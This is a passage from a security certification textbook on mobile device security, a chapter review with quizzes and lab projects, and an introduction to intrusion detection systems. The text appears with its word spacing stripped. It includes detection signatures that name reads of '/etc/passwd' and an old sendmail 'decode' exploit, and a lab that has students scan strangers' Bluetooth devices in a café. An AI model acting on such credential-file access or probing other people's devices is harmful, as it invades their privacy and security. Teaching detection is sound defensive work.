LocationServicesMobiledevicesbytheirspecificnaturecanmove,andhencelocationofthedevicecanhavesignificantramificationswithrespecttoitsuse.MobiledevicescanconnecttomultiplepublicWi-Filocations,andtheycanprovideuserswithnavigationandotherlocationcontext-sensitiveinformation,suchasalocalsale.Toenablethisfunctionality,location
servicesareasetoffunctionstoenable,yetcontrol,thelocationinformationpossessedbythedevice.
Geo-TaggingGeo-taggingisthepostingoflocationinformationintoadatastreamsignifyingwherethedevicewaswhenthestreamwascreated.Asmanymobiledevicesincludeon-boardcameras,andthephotos/videostheytakecandivulgeinformation,geo-taggingcanmakelocationpartofanypictureorvideo.Thisinformationcanbeassociatedwithanythingthecameracanimage—whiteboards,documents,eventhelocationofthedevicewhenthephoto/videowastakenviageo-tagging.Postingphotoswithgeo-tagsembeddedinthemhasitsuse,butitcan
alsounexpectedlypublishinformationthatusersmaynotwanttoshare.Forexample,ifyouuseyoursmartphonetotakeaphotoofyourcarinthedrivewayandthenpostthephotoontheInternetinanattempttosellyourcar,ifgeo-taggingwasenabledonthesmartphone,thelocationofwherethephotowastakenisembeddedasmetadatainthedigitalphoto.Suchapostingcouldinadvertentlyexposewhereyourhomeislocated.Somesocialmediaapplicationsstripoutthemetadataonaphotobeforeposting,butthentheypostwhereyouposteditfrominthepostingitself.Therehasbeenmuchpublicdiscussiononthistopic,andgeo-taggingcanbedisabledonmostmobiledevices.Itisrecommendedthatitbedisabledunlessyouhaveaspecificreasonforhavingthelocationinformationembeddedinthephoto.
MobileApplicationSecurityDevicesarenottheonlyconcerninthemobileworld.Applicationsthatrunonthedevicesalsorepresentsecuritythreatstotheinformationthatisstoredonandprocessedbythedevice.Applicationsarethesoftwareelementsthatcanbeusedtoviolatesecurity,evenwhentheuserisnotaware.Manygamesandutilitiesoffervaluetotheuser,butatthesametimetheyscrapeinformationstoresonthedeviceforinformation.
ApplicationControlMostmobiledevicevendorsprovidesomekindofappstoreforfindingandpurchasingappsfortheirmobiledevices.Thevendorsdoareasonablejobofmakingsurethatofferedappsareapprovedanddon’tcreateanovertsecurityrisk.Yetmanyappsrequestaccesstovariousinformationstoresonthemobiledeviceaspartoftheirbusinessmodel.Understandingwhataccessisrequestedandapproveduponinstallationofappsisanimportantsecurityprecaution.Yourcompanymayhavetorestrictthetypesofappsthatcanbedownloadedandusedonmobiledevices.Ifyouneedverystrongprotection,yourcompanycanbeveryproactiveandprovideanenterpriseappstorewhereonlycompany-approvedappsareavailable,withacorrespondingpolicythatappscannotbeobtainedfromanyothersource.
KeyandCredentialManagementTheMDMmarketplaceismaturingquickly.KeyandcredentialmanagementservicesarebeingintegratedintomostMDMservicestoensurethatexistingstrongpoliciesandprocedurescanbeextendedtomobileplatformssecurely.TheseservicesincludeprotectionofkeysfordigitalsignaturesandS/MIMEencryptionanddecryption.Keysandcredentialsareamongthehighest-valueitemsthatcanbefoundonmobiledevices,soensuringprotectionforthemisakeyelementinmobiledevicesecurity.Thekeysandcredentialsstoredonthedevicecanbeusedbymultipleapplications.Providingprotectionofthesekeyswhilestillmaintainingusabilityofthemisanessentialelementofmodernmobileapplicationsecurity.
AuthenticationWhenmobiledevicesareusedtoaccessbusinessnetworks,authenticationbecomesanissue.Thereareseverallevelsofauthenticationthatcanbeanissue.Isthedeviceallowedtoaccessthenetwork?Istheuserofthedeviceanetworkuser?Ifso,howdoyouauthenticatetheuser?Mobiledevices
havesomeadvantagesinthattheycanstorecertificates,whichbytheirverynaturearemoresecurethanpasswords.Thismovestheauthenticationproblemtotheendpoint,whereitreliesonpasscodes,screen-locks,andothermobiledeviceprotections.Thesecanberelativelyweakunlessstructuredtogether,includingwipingafteralimitednumberoffailures.Theriskinmobileauthenticationisthatstrongcredentialsstoredinthedeviceareprotectedbythelessrigorouspasscodeandtheenduser.Enduserscansharetheirmobiledevices,andbyproxyunwittinglysharetheirstrongcorporateauthenticationcodes.
ApplicationWhitelistingAsdiscussedinthe“ApplicationControl”sectionearlierinthechapter,controllingwhatapplicationsadevicecanaccessmaybeanimportantelementofyourcompany’smobiledevicepolicy.Applicationwhitelistingandblacklistingenablesyoutocontrolandblockapplicationsavailableonthemobiledevice.ThisisusuallyadministeredthroughsometypeofMDMcapability.Applicationwhitelistingcanimprovesecuritybypreventingunapprovedapplicationsfrombeinginstalledandrunonthedevice.
EncryptionJustasthedeviceshouldbeencrypted,therebyprotectingallinformationonthedevice,applicationsshouldbeencryptedaswell.Justemployingencryptionforthedatastoreisnotsufficient.Ifthedeviceisfullyencrypted,thenallappswouldhavetohaveaccesstothedata,inessencebypassingtheencryptionfromanapppointofview.Appswithsensitiveinformationshouldcontrolaccessviatheirownsetofprotections.Theonlywaytosegregatedatawithinthedeviceisforappstomanagetheirowndatastoresthroughapp-specificencryption.Thiswillallowsensitivedatatobeprotectedfromrogueapplicationsthatwouldleakdataifuniformaccesswasallowed.
TransitiveTrust/AuthenticationSecurityacrossmultipledomains/platformsisprovidedthroughtrustrelationships.Whentrustrelationshipsbetweendomainsorplatformsexist,authenticationforeachdomaintruststheauthenticationforallothertrusteddomains.Thuswhenanapplicationisauthenticated,itsauthenticationisacceptedbyallotherdomains/platformsthattrusttheauthenticatingdomainorplatform.Trustrelationshipscanbeverycomplexinmobiledevices,andoftensecurityaspectsaren’tproperlyimplemented.Mobiledevicestendtobeusedacrossnumeroussystems,includingbusiness,personal,public,andprivate.Thisgreatlyexpandstheriskprofileandopportunityfortransitivetrust–basedattacks.Aswithallotherapplications,mobileapplicationsshouldbecarefullyreviewedtoensurethattrustrelationshipsaresecure.
Chapter12Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutwirelesssecurityandmobiledevices.
Describethedifferentwirelesssystemsinusetoday
WirelessApplicationProtocol(WAP)isusedonsmall,handhelddeviceslikecellphonesforout-of-the-officeconnectivity.
802.11istheIEEEstandardforwirelesslocalareanetworks.Thestandardincludesseveraldifferentspecificationsof802.11networks,suchas802.11b,802.11a,802.11g,and802.11n.
DetailWAPanditssecurityimplications
WAPisthedataprotocolusedbymanycellularphonestodelivere-mailandlightweightwebservices.
DesignerscreatedWTLSasamethodtoensureprivacyofdatabeingbroadcastoverWAP.
WTLShasanumberofinherentsecurityproblems,suchasweakencryptionnecessitatedbythelowcomputingpowerofthedevicesandthenetworktransitionthatmustoccuratthecellularprovider’snetwork,ortheWAPgap.
Identify802.11’ssecurityissuesandpossiblesolutions
802.11doesnotallowphysicalcontrolofthetransportmechanism.
Transmissionofallnetworkdatawirelesslytransmitsframestoallwirelessmachines,notjustasingleclient,similartoEthernethubdevices.
PoorauthenticationiscausedbytheSSIDbeingbroadcasttoanyonelistening.
FlawedimplementationoftheRC4encryptionalgorithmmakesevenencryptedtrafficsubjecttointerceptionanddecryption.
Examinetheelementsneededforenterprisewirelessdeployment
Wirelesscoveragecanbeafunctionofantennatype,placement,andpowerlevels.
Captiveportalscanbeusedtocontrolaccesstowirelesssystems.
Examinethesecurityofmobilesystems
Mobiledeviceshavespecificsecurityconcernsandspecificcontrolstoassistinsecuringthem.
BYODhasitsownconcernsandpoliciesandprocedurestomanagemobiledevicesintheenterprise.
Mobileapplicationsrequiresecurity,andtheissuesassociatedwithmobile,apps,andsecurityneedtobeaddressed.
KeyTerms2.4GHzband(344)5GHzband(348)beaconframes(349)bluebugging(346)bluejacking(345)bluesnarfing(346)BluetoothDOS(346)captiveportal(362)confidentiality(340)direct-sequencespreadspectrum(DSSS)(348)eviltwin(352)geo-tagging(370)IEEE802.1X(357)IEEE802.11(337)initializationvector(IV)(340)jailbreaking(367)MACfiltering(359)MIMO(361)mobiledevicemanagement(MDM)(365)nearfieldcommunication(NFC)(347)orthogonalfrequencydivisionmultiplexing(OFDM)(348)RC4streamcipher(350)remotewiping(363)rogueaccesspoint(352)screenlocking(363)servicesetidentifier(SSID)(349)
sitesurvey(361)TemporalKeyIntegrityProtocol(TKIP)(355)WAPgap(341)Wi-FiProtectedAccess2(WPA2)(355)WiMax(337)WiredEquivalentPrivacy(WEP)(350)WirelessApplicationProtocol(WAP)(339)WirelessTransportLayerSecurity(WTLS)(340)ZigBee(337)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.AnAPuses_______________toadvertiseitsexistencetopotentialwirelessclients.
2.The_______________isthepartoftheRC4cipherthathasaweakimplementationinWEP.
3.Twocommonmobiledevicesecuritymeasuresare_______________and_______________.
4.WAPusesthe_______________protocoltoattempttoensureconfidentialityofdata.
5.The32-characteridentifierattachedtotheheaderofapacketusedforauthenticationtoan802.11accesspointisthe_______________.
6._______________isafeaturethatcandiscloseauser’spositionwhensharingphotos.
7.802.11iupdatestheflawedsecuritydeployedin_______________.8.Thestandardforwirelesslocalareanetworksiscalled
_______________.
9.Thetypeofapplicationusedtocontrolsecurityacrossmultiplemobiledevicesinanenterpriseiscalled_______________.
10.802.11ausesfrequenciesinthe_______________.
Multiple-ChoiceQuiz1.Bluebuggingcangiveanattackerwhat?
A.Allofyourcontacts
B.Theabilitytosend“shock”photos
C.Totalcontroloveramobilephone
D.Avirus
2.Howdoes802.11nimprovenetworkspeed?A.Widerbandwidth
B.Higherfrequency
C.Multiple-inputmultiple-output(MIMO)
D.BothAandC
3.WTLSensuresintegritythroughwhatdevice?A.Publickeyencryption
B.Messageauthenticationcodes
C.SourceIP
D.Digitalsignatures
4.WEPhasusedanimplementationofwhichofthefollowingencryptionalgorithms?
A.SHA
B.ElGamal
C.RC4
D.Triple-DES
5.WhatelementdoesnotbelonginamobiledevicesecuritypolicyinanenterpriseemployingBYOD?
A.Separationofpersonalandbusiness-relatedinformation
B.Remotewiping
C.Passwordsandscreen-locking
D.Mobiledevicecarrierselection
6.Whatisbluejacking?A.Stealingaperson’smobilephone
B.SendinganunsolicitedmessageviaBluetooth
C.BreakingaWEPkey
D.LeavingyourBluetoothindiscoverablemode
7.WhiletheSSIDprovidessomemeasureofauthentication,whyisitnotveryeffective?
A.Itisdictatedbythemanufactureroftheaccesspoint.
B.Itisencrypted.
C.Itisbroadcastineverybeaconframe.
D.SSIDisnotanauthenticationfunction.
8.The802.1XprotocolisaprotocolforEthernet:A.Authentication
B.Speed
C.Wireless
D.Cabling
9.WhatisthebestwaytoavoidproblemswithBluetooth?A.Keeppersonalinfooffyourphone
B.KeepBluetoothdiscoverabilityoff
C.Buyanewphoneoften
D.Encryption
10.Whyisattackingwirelessnetworkssopopular?A.Therearemorewirelessnetworksthanwired.
B.TheyallrunWindows.
C.It’seasy.
D.It’smoredifficultandmoreprestigiousthanothernetworkattacks.
EssayQuiz1.Produceareportonwhysensitiveinformationshouldnotbesent
overtheWirelessApplicationProtocol.
2.Whenyouwanttostartscanningforroguewirelessnetworks,yoursupervisorasksyoutowriteamemodetailingthethreatsofroguewirelessaccesspoints.Whatinformationwouldyouincludeinthememo?
3.Writeasecuritypolicyforcompany-ownedcellphonesthatusetheBluetoothprotocol.
4.Writeamemorecommendingupgradingyourorganization’sold
802.11binfrastructuretoan802.11i-compliantnetwork,anddetailthesecurityenhancements.
LabProjects
•LabProject12.1SetupNetStumblerorKismetonacomputer,andthenuseittofindwirelessaccesspoints.Youwillneedthefollowing:
AlaptopwithWindowsorLinuxinstalled
Acompatiblewireless802.11networkadapterThendothefollowing:1.DownloadNetStumblerfromwww.netstumbler.comorKismetfrom
www.kismetwireless.net.2.ForNetStumbler,runtheWindowsInstaller.ForKismet,untarthesourcefileandthen
execute,inorder,./configure,make,andmakeinstall.
3.Starttheprogramandmakesurethatitseesyourwirelessadapter.4.Takethelaptoponyournormalcommute(ordrivearoundyourneighborhood)with
NetStumbler/Kismetrunning.
5.Loganyaccesspointsyoudetect.
•LabProject12.2AttempttoscantheareaforBluetoothdevices.YouwillneedacellphonewithBluetoothinstalledoracomputerwithaBluetoothadapter.Thendothefollowing:
1.Ifyou’reusingaPC,downloadBlueScannerfromSourceForgeathttp://sourceforge.net/projects/bluescanner/.
2.Takeyourphoneorcomputertoaplacewithmanypeople,suchasacafé.
3.StarttheprogramandmakesurethatitseesyourBluetoothadapter.4.AttempttoscanforvulnerableBluetoothdevices.
5.Ifyou’reusingyourphone,tellittoscanforBluetoothdevices.Anydevicesthatyoufindarerunningin“discoverable”modeandarepotentiallyexploitable.
chapter13 IntrusionDetectionSystemsandNetwork
Security
Oneperson’s“paranoia”isanotherperson’s“engineeringredundancy.”
—MARCUSJ.RANUM
A
Inthischapter,youwilllearnhowto
Applytheappropriatenetworktoolstofacilitatenetworksecurity
Determinetheappropriateuseoftoolstofacilitatenetworksecurity
Applyhost-basedsecurityapplications
nintrusiondetectionsystem(IDS)isasecuritysystemthatdetectsinappropriateormaliciousactivityonacomputerornetwork.Mostorganizationsusetheirownapproachestonetworksecurity,choosing
thelayersthatmakesenseforthemaftertheyweighrisks,potentialsforloss,costs,andmanpowerrequirements.Thefoundationforalayerednetworksecurityapproachusuallystarts
withawell-securedsystem,regardlessofthesystem’sfunction(whetherit’sauserPCoracorporatee-mailserver).Awell-securedsystemusesup-to-dateapplicationandoperatingsystempatches,requireswell-chosenpasswords,runstheminimumnumberofservicesnecessary,andrestrictsaccesstoavailableservices.Ontopofthatfoundation,youcanaddlayersofprotectivemeasuressuchasantivirusproducts,firewalls,sniffers,andIDSs.Someofthemorecomplicatedandinterestingtypesofnetwork/data
securitydevicesareIDSs,whicharetothenetworkworldwhatburglaralarmsaretothephysicalworld.ThemainpurposeofanIDSistoidentifysuspiciousormaliciousactivity,noteactivitythatdeviatesfromnormalbehavior,catalogandclassifytheactivity,and,ifpossible,respondtotheactivity.
HistoryofIntrusionDetectionSystemsLikemuchofthenetworktechnologyweseetoday,IDSsgrewfromaneedtosolvespecificproblems.LiketheInternetitself,theIDSconceptcamefromU.S.DepartmentofDefense–sponsoredresearch.Intheearly
1970s,theU.S.governmentandmilitarybecameincreasinglyawareoftheneedtoprotecttheelectronicnetworksthatwerebecomingcriticaltodailyoperations.
EarlyHistoryofIDSIn1972,JamesAndersonpublishedapaperfortheU.S.AirForceoutliningthegrowingnumberofcomputersecurityproblemsandtheimmediateneedtosecureAirForcesystems(JamesP.Anderson,“ComputerSecurityTechnologyPlanningStudyVolume2,”October1972,http://seclab.cs.ucdavis.edu/projects/history/papers/ande72.pdf).Andersoncontinuedhisresearchandin1980publishedafollow-uppaperoutliningmethodstoimprovesecurityauditingandsurveillancemethods(“ComputerSecurityThreatMonitoringandSurveillance,”April15,1980,http://csrc.nist.gov/publications/history/ande80.pdf).Inthispaper,Andersonpioneeredtheconceptofusingsystemauditfilestodetectunauthorizedaccessandmisuse.Healsosuggestedtheuseofautomateddetectionsystems,whichpavedthewayformisusedetectiononmainframesystemsinuseatthetime.WhileAnderson’sworkgottheeffortsstarted,theconceptofareal-time,rule-basedIDS
didn’treallyexistuntilDorothyDenningandPeterNeumanndevelopedthefirstreal-timeIDSmodel,called“TheIntrusionDetectionExpertSystem(IDES),”fromtheirresearchbetween1984and1986.In1987,Denningpublished“AnIntrusion-DetectionModel,”apaperthatlaidoutthemodelonwhichmostmodernIDSsarebased(andwhichappearsinIEEETransactionsonSoftwareEngineering,Vol.SE-13,No.2[February1987]:222—232).
TheU.S.governmentcontinuedtofundresearchthatledtoprojectssuchasDiscovery,Haystack,MulticsIntrusionDetectionandAlertingSystem(MIDAS),andNetworkAuditDirectorandIntrusionReporter(NADIR).Finally,in1989,HaystackLabsreleasedStalker,thefirstcommercialIDS.Stalkerwashost-basedandworkedbycomparingauditdatatoknownpatternsofsuspiciousactivity.Whilethemilitaryandgovernmentembracedtheconcept,thecommercialworldwasveryslowtoadoptIDSproducts,anditwasseveralyearsbeforeothercommercialproductsbegantoemerge.Intheearlytomid-1990s,ascomputersystemscontinuedtogrow,
companiesstartedtorealizetheimportanceofIDSs;however,thesolutionsavailablewerehost-basedandrequiredagreatdealoftimeandmoneytomanageandoperateeffectively.Focusbegantoshiftawayfromhost-basedsystems,andnetwork-basedIDSsbegantoemerge.In1995,WheelGroupwasformedinSanAntonio,Texas,todevelopthefirst
commercialnetwork-basedIDSproduct,calledNetRanger.NetRangerwasdesignedtomonitornetworklinksandthetrafficmovingacrossthelinkstoidentifymisuseaswellassuspiciousandmaliciousactivity.NetRanger’sreleasewasquicklyfollowedbyInternetSecuritySystems’RealSecurein1996.SeveralotherplayersfollowedsuitandreleasedtheirownIDSproducts,butitwasn’tuntilthenetworkinggiantCiscoSystemsacquiredWheelGroupinFebruary1998thatIDSswererecognizedasavitalpartofanynetworksecurityinfrastructure.Figure13.1offersatimelineforthesedevelopments.
•Figure13.1HistoryoftheInternetandIDS
IDSOverviewAsmentioned,anIDSissomewhatlikeaburglaralarm.Itwatchestheactivitygoingonarounditandtriestoidentifyundesirableactivity.IDSsaretypicallydividedintotwomaincategories,dependingonhowtheymonitoractivity:
ExamTip:Knowthedifferencesbetweenhost-basedandnetwork-basedIDSs.Ahost-basedIDSrunsonaspecificsystem(serverorworkstation)andlooksatalltheactivityonthathost.Anetwork-basedIDSsniffstrafficfromthenetworkandseesonlyactivitythatoccursonthenetwork.
Host-basedIDS(HIDS)Examinesactivityonanindividualsystem,suchasamailserver,webserver,orindividualPC.Itisconcernedonlywithanindividualsystemandusuallyhasnovisibilityintotheactivityonthenetworkorsystemsaroundit.
Network-basedIDS(NIDS)Examinesactivityonthenetworkitself.Ithasvisibilityonlyintothetrafficcrossingthenetworklinkitismonitoringandtypicallyhasnoideaofwhatishappeningonindividualsystems.
Whetheritisnetwork-orhost-based,anIDStypicallyconsistsofseveralspecializedcomponentsworkingtogether,asillustratedinFigure13.2.Thesecomponentsareoftenlogicalandsoftware-basedratherthanphysicalandwillvaryslightlyfromvendortovendorandproducttoproduct.Typically,anIDShasthefollowinglogicalcomponents:
•Figure13.2LogicaldepictionofIDScomponents
Trafficcollector(orsensor)Collectsactivity/eventsfortheIDStoexamine.OnaHIDS,thiscouldbelogfiles,auditlogs,ortrafficcomingtoorleavingaspecificsystem.OnaNIDS,thisistypicallyamechanismforcopyingtrafficoffthenetworklink—basicallyfunctioningasasniffer.Thiscomponentisoftenreferredtoasasensor.
AnalysisengineExaminesthecollectednetworktrafficandcomparesittoknownpatternsofsuspiciousormaliciousactivitystoredinthesignaturedatabase.Theanalysisengineisthe“brains”oftheIDS.
SignaturedatabaseAcollectionofpatternsanddefinitionsofknownsuspiciousormaliciousactivity.
UserinterfaceandreportingInterfaceswiththehumanelement,
providingalertswhenappropriateandgivingtheuserameanstointeractwithandoperatetheIDS.
TechTip
IDSSignaturesAnIDSreliesheavilyonitssignaturedatabasejustlikeantivirusproductsrelyontheirvirusdefinitions.Ifanattackissomethingcompletelynew,anIDSmaynotrecognizethetrafficasmalicious.
Let’slookatanexampletoseehowallthesecomponentsworktogether.Imagineanetworkintruderisscanningyourorganizationforsystemsrunningawebserver.TheintruderlaunchesaseriesofnetworkprobesagainsteveryIPaddressinyourorganization.Thetrafficfromtheintrudercomesintoyournetworkandpassesthroughthetrafficcollector(sensor).Thetrafficcollectorforwardsthetraffictotheanalysisengine.Theanalysisengineexaminesandcategorizesthetraffic—itidentifiesalargenumberofprobescomingfromthesameoutsideIPaddress(theintruder).Theanalysisenginecomparestheobservedbehavioragainstthesignaturedatabaseandgetsamatch.Theintruder’sactivitymatchesaTCPportscan.Theintruderissendingprobestomanydifferentsystemsinashortperiodoftime.Theanalysisenginegeneratesanalarmthatispassedofftotheuserinterfaceandreportingmechanisms.Theuserinterfacegeneratesanotificationtotheadministrator(icon,logentry,andsoon).Theadministratorseesthealertandcannowdecidewhattodoaboutthepotentiallymalicioustraffic.AlarmstorageissimplyarepositoryofalarmstheIDShasrecorded—mostIDSproductsallowadministratorstoruncustomizedreportsthatsiftthroughthecollectedalarmsforitemstheadministratorissearchingfor,suchasallthealarmsgeneratedbyaspecificIPaddress.
MostIDSscanbetunedtofitaparticularenvironment.Certainsignaturescanbeturnedoff,tellingtheIDSnottolookforcertaintypesoftraffic.Forexample,ifyouareoperatinginapureUNIXenvironment,youmaynotwishtoseeWindows-basedalarms,astheywillnotaffectyoursystems.Additionally,theseverityofthealarmlevelscanbeadjusteddependingonhowconcernedyouareovercertaintypesoftraffic.SomeIDSsalsoallowtheusertoexcludecertainpatternsofactivityfromspecifichosts.Inotherwords,youcantelltheIDStoignorethefactthatsomesystemsgeneratetrafficthatlookslikemaliciousactivity,becauseitreallyisn’t.
Inadditiontothenetworkversushostdistinction,someIDSvendorswillfurthercategorizeanIDSbasedonhowitperformsthedetectionofsuspiciousormalicioustraffic.Thedifferentmodelsusedarecoveredinthenextsection.
IDSModelsInadditiontobeingdividedalongthehostandnetworklines,IDSsareoftenclassifiedaccordingtothedetectionmodeltheyuse:anomalyormisuse.ForanIDS,amodelisamethodforexaminingbehaviorsothattheIDScandeterminewhetherthatbehavioris“notnormal”orinviolationofestablishedpolicies.Ananomalydetectionmodelisthemorecomplicatedofthetwo.In
thismodel,theIDSmustknowwhat“normal”behavioronthehostornetworkbeingprotectedreallyis.Oncethe“normal”behaviorbaselineisestablished,theIDScanthengotoworkidentifyingdeviationsfromthenorm,whicharefurtherscrutinizedtodeterminewhetherornotthatactivityismalicious.BuildingtheprofileofnormalactivityisusuallydonebytheIDS,withsomeinputfromsecurityadministrators,andcantakedaystomonths.TheIDSmustbeflexibleandcapableenoughtoaccountforthingssuchasnewsystems,newusers,movementofinformationresources,andotherfactors,butbesensitiveenoughtodetectasingleuserillegallyswitchingfromoneaccounttoanotherat3A.M.onaSaturday.
ExamTip:Anomalydetectionlooksforthingsthatareoutoftheordinary,suchasauserlogginginwhenhe’snotsupposedtoorunusuallyhighnetworktrafficintoandoutofaworkstation.
Anomalydetectionwasdevelopedtomakethesystemcapableofdealingwithvariationsintrafficandbetterabletodeterminewhichactivitypatternsweremalicious.Aperfectlyfunctioninganomaly-basedsystemwouldbeabletoignorepatternsfromlegitimatehostsandusersbutstillidentifythosepatternsassuspiciousshouldtheycomefromapotentialattacker.Unfortunately,mostanomaly-basedsystemssufferfromextremelyhighfalsepositives,especiallyduringthe“break-in”periodwhiletheIDSislearningthenetwork.Ontheotherhand,ananomaly-basedsystemisnotrestrictedtoaspecificsignaturesetandisfarmorelikelytoidentifyanewexploitorattacktoolthatwouldgounnoticedbyatraditionalIDS.
ExamTip:Misusedetectionlooksforthingsthatviolatepolicy,suchasadenial-of-serviceattacklaunchedatyourwebserveroranattackerattemptingtobrute-forceanSSHsession.
Amisusedetectionmodelisalittlesimplertoimplement,andthereforeit’sthemorepopularofthetwomodels.Inamisusedetectionmodel,theIDSlooksforsuspiciousactivityoractivitythatviolatesspecificpoliciesandthenreactsasithasbeenprogrammedtodo.Thisreactioncanbeanalarm,e-mail,routerreconfiguration,orTCPresetmessage.Technically,misusedetectionisthemoreefficientmodel,asittakesfewerresourcestooperate,doesnotneedtolearnwhat“normal”behavioris,andwillgenerateanalarmwheneverapatternissuccessfullymatched.However,themisusemodel’sgreatestweaknessisitsrelianceonapredefinedsignaturebase—anyactivity,maliciousorotherwise,thatthe
misuse-basedIDSdoesnothaveasignatureforwillgoundetected.Despitethatdrawbackandbecauseitiseasierandcheapertoimplement,mostcommercialIDSproductsarebasedonthemisusedetectionmodel.SomeanalystsbreakIDSmodelsdownevenfurtherintofourcategories
dependingonhowtheIDSoperatesanddetectsmalicioustraffic(thesamemodelscanalsobeappliedtointrusionpreventionsystemsaswell—bothNIPSandHIPS):
Behavior-basedThismodelreliesonacollectedsetof“normalbehavior”:whatshouldhappenonthenetworkandisconsidered“normal”or“acceptable”traffic.Behaviorthatdoesnotfitintothe“normal”activitycategoriesorpatternsisconsideredsuspiciousormalicious.Thismodelcanpotentiallydetectzero-dayorunpublishedattacksbutcarriesahighfalsepositiverateasanynewtrafficpatterncanbelabeledas“suspect.”
Signature-basedThismodelreliesonapredefinedsetofpatterns(calledsignatures).TheIDShastoknowwhatbehaviorisconsidered“bad”aheadoftimebeforeitcanidentifyandactuponsuspiciousormalicioustraffic.
Anomaly-basedThismodelisessentiallythesameasbehavior-based.TheIDSisfirsttaughtwhat“normal”trafficlookslikeandthenlooksfordeviationstothose“normal”patterns.
HeuristicThismodelusesartificialintelligencetodetectintrusionsandmalicioustraffic.AheuristicmodelistypicallyimplementedthroughalgorithmsthathelpanIDSdecideifatrafficpatternismaliciousornot.Forexample,aURLcontaining10ormoreofthesamerepeatingcharactermaybeconsidered“bad”trafficasasinglesignature.Withaheuristicmodel,theIDSunderstandsthatif10repeatingcharactersarebad,11arestillbad,and20areevenworse.Thisimplementationoffuzzylogicallowsthismodeltofallsomewherebetweensignature-basedandbehavior-basedmodels.
SignaturesAsyouhaveprobablydeducedfromthediscussionsofar,oneofthecriticalelementsofanygoodIDSisthesignaturedatabase—thesetofpatternstheIDSusestodeterminewhetherornotactivityispotentiallyhostile.Signaturescanbeverysimpleorremarkablycomplicated,dependingontheactivitytheyaretryingtohighlight.Ingeneral,signaturescanbedividedintotwomaingroups,dependingonwhatthesignatureislookingfor:content-basedandcontext-based.Content-basedsignaturesaregenerallythesimplest.Theyare
designedtoexaminethecontentofsuchthingsasnetworkpacketsorlogentries.Content-basedsignaturesaretypicallyeasytobuildandlookforsimplethings,suchasacertainstringofcharactersoracertainflagsetinaTCPpacket.Herearesomeexamplecontent-basedsignatures:
Matchingthecharacters/etc/passwdinaTelnetsession.OnaUNIXsystem,thenamesofvaliduseraccounts(andsometimesthepasswordsforthoseuseraccounts)arestoredinafilecalledpasswdlocatedintheetcdirectory.
Matchingthecharacters“to:decode”intheheaderofane-mailmessage.Oncertainolderversionsofsendmail,sendingane-mailmessageto“decode”wouldcausethesystemtoexecutethecontentsofthee-mail.
Context-basedsignaturesaregenerallymorecomplicated,astheyaredesignedtomatchlargepatternsofactivityandexaminehowcertaintypesofactivityfitintotheotheractivitiesgoingonaroundthem.Contextsignaturesgenerallyaddressthequestion:Howdoesthiseventcomparetoothereventsthathavealreadyhappenedormighthappeninthenearfuture?Context-basedsignaturesaremoredifficulttoanalyzeandtakemoreresourcestomatch,astheIDSmustbeableto“remember”pasteventstomatchcertaincontextsignatures.Herearesomeexamplecontext-basedsignatures:
Matchapotentialintruderscanningforopenwebserversonaspecificnetwork.Apotentialintrudermayuseaportscannertolookforanysystemsacceptingconnectionsonport80.Tomatchthissignature,theIDSmustanalyzeallattemptedconnectionstoport80andthenbeabletodeterminewhichconnectionattemptsarecomingfromthesamesourcebutaregoingtomultiple,differentdestinations.
IdentifyaNessusscan.Nessusisanopen-sourcevulnerabilityscannerthatallowssecurityadministrators(andpotentialattackers)toquicklyexaminesystemsforvulnerabilities.Dependingonthetestschosen,Nessustypicallyperformsthetestsinacertainorder,oneaftertheother.TobeabletodeterminethepresenceofaNessusscan,theIDSmustknowwhichtestsNessusrunsaswellasthetypicalorderinwhichthetestsarerun.
Identifyapingfloodattack.AsingleICMPpacketonitsownisgenerallyregardedasharmless,certainlynotworthyofanIDSsignature.YetthousandsofICMPpacketscomingtoasinglesysteminashortperiodoftimecanhaveadevastatingeffectonthereceivingsystem.ByfloodingasystemwiththousandsofvalidICMPpackets,anattackercankeepatargetsystemsobusyitdoesn’thavetimetodoanythingelse—averyeffectivedenial-of-serviceattack.Toidentifyapingflood,theIDSmustrecognizeeachICMPpacketandkeeptrackofhowmanyICMPpacketsdifferentsystemshavereceivedintherecentpast.
ExamTip:Knowthedifferencesbetweencontent-basedandcontext-basedsignatures.Content-basedsignaturesmatchspecificcontent,suchasacertainstringorseriesofcharacters(matchingthestring/etc/passwdinanFTPsession).Context-basedsignaturesmatchapatternofactivitybasedontheotheractivityaroundit,suchasaportscan.
Tofunction,theIDSmusthaveadecentsignaturebasewithexamplesofknown,undesirableactivitythatitcanusewhenanalyzingtrafficor
events.AnytimeanIDSmatchescurrenteventsagainstasignature,theIDScouldbeconsideredsuccessful,asithascorrectlymatchedthecurrenteventagainstaknownsignatureandreactedaccordingly(usuallywithanalarmoralertofsometype).
FalsePositivesandFalseNegativesViewedinitssimplestform,anIDSisreallyjustlookingatactivity(beithost-basedornetwork-based)andmatchingitagainstapredefinedsetofpatterns.Whenitmatchesactivitytoaspecificpattern,theIDScannotknowthetrueintentbehindthatactivity—whetheritisbenignorhostile—andthereforeitcanreactonlyasithasbeenprogrammedtodo.Inmostcases,thismeansgeneratinganalertthatmustthenbeanalyzedbyahumanwhotriestodeterminetheintentofthetrafficfromwhateverinformationisavailable.WhenanIDSmatchesapatternandgeneratesanalarmforbenigntraffic,meaningthetrafficwasnothostileandnotathreat,thisiscalledafalsepositive.Inotherwords,theIDSmatchedapatternandraisedanalarmwhenitdidn’treallyneedtodoso.KeepinmindthattheIDScanonlymatchpatternsandhasnoabilitytodetermineintentbehindtheactivity,soinsomewaysthisisanunfairlabel.Technically,theIDSisfunctioningcorrectlybymatchingthepattern,butfromahumanstandpointthisisnotinformationtheanalystneededtosee,asitdoesnotconstituteathreatanddoesnotrequireintervention.
Toreducethegenerationoffalsepositives,mostadministratorstunetheIDS.“Tuning”anIDSistheprocessofconfiguringtheIDSsothatitworksinyourspecificenvironment—generatingalarmsformalicioustrafficandnotgeneratingalarmsfortrafficthatis“normal”foryournetwork.EffectivelytuninganIDScanresultinsignificantreductionsinfalse-positivetraffic.
AnIDSisalsolimitedbyitssignatureset—itcanmatchonlyactivityforwhichithasstoredpatterns.HostileactivitythatdoesnotmatchanIDSsignatureandthereforegoesundetectediscalledafalsenegative.Inthis
case,theIDSisnotgeneratinganyalarms,eventhoughitshouldbe,givingafalsesenseofsecurity.
